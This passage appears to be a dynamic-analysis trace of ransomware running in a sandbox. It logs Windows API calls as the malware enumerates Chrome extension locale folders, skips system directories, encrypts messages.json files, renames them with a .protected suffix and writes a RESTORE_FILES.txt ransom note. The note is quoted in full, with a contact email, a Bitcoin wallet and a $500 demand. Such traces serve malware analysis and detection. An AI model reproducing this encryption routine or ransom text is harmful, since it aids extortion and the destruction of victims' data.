HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.protected")) returned 1 [0079.855] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.855] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.855] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\RESTORE_FILES.txt") returned 161 [0079.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.856] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.856] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.856] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.856] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.857] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.857] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.857] CloseHandle (hObject=0x164) returned 1 [0079.857] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.857] lstrcmpiW (lpString1="ru", lpString2="Windows") returned -1 [0079.857] lstrcmpiW (lpString1="ru", lpString2="Program Files") returned 1 [0079.857] lstrcmpiW (lpString1="ru", lpString2="Program Files (x86)") returned 1 [0079.857] lstrcmpiW (lpString1="ru", lpString2="$Recycle.bin") returned 1 [0079.857] lstrcmpiW (lpString1="ru", lpString2="System Volume Information") returned -1 [0079.857] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru") returned 143 [0079.857] lstrcmpW (lpString1="ru", lpString2=".") returned 1 [0079.857] lstrcmpW (lpString1="ru", lpString2="..") returned 1 [0079.857] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\*") returned 145 [0079.857] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.857] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.857] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.858] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.858] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.858] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.858] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\.") returned 145 [0079.858] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.858] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.858] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.858] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.858] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.858] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.858] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.858] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\..") returned 146 [0079.858] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.858] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.858] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.858] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.858] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.858] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.858] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.858] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.858] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json") returned 157 [0079.858] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.858] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.858] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.858] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.859] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json") returned 157 [0079.859] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json") returned 157 [0079.859] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json") returned 157 [0079.859] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.859] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.860] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.860] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.860] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.860] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.860] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.861] CloseHandle (hObject=0x168) returned 1 [0079.861] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.protected") returned 167 [0079.861] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.protected")) returned 1 [0079.861] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.861] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.861] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\RESTORE_FILES.txt") returned 161 [0079.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.862] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.862] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.863] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.863] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.863] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.863] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.863] CloseHandle (hObject=0x164) returned 1 [0079.863] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.863] lstrcmpiW (lpString1="sk", lpString2="Windows") returned -1 [0079.863] lstrcmpiW (lpString1="sk", lpString2="Program Files") returned 1 [0079.863] lstrcmpiW (lpString1="sk", lpString2="Program Files (x86)") returned 1 [0079.863] lstrcmpiW (lpString1="sk", lpString2="$Recycle.bin") returned 1 [0079.863] lstrcmpiW (lpString1="sk", lpString2="System Volume Information") returned -1 [0079.863] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk") returned 143 [0079.863] lstrcmpW (lpString1="sk", lpString2=".") returned 1 [0079.863] lstrcmpW (lpString1="sk", lpString2="..") returned 1 [0079.864] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\*") returned 145 [0079.864] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.864] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.864] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.864] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.865] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.865] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.865] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\.") returned 145 [0079.865] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.865] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.865] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.865] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.865] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.865] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.865] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.865] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\..") returned 146 [0079.865] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.865] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.865] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.865] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.865] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.865] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.865] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.865] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.865] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json") returned 157 [0079.865] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.865] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.865] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.865] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.865] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.866] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json") returned 157 [0079.866] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.866] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json") returned 157 [0079.866] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.866] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json") returned 157 [0079.866] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.866] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.867] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.867] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.867] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.867] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.867] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.867] CloseHandle (hObject=0x168) returned 1 [0079.867] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.protected") returned 167 [0079.867] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 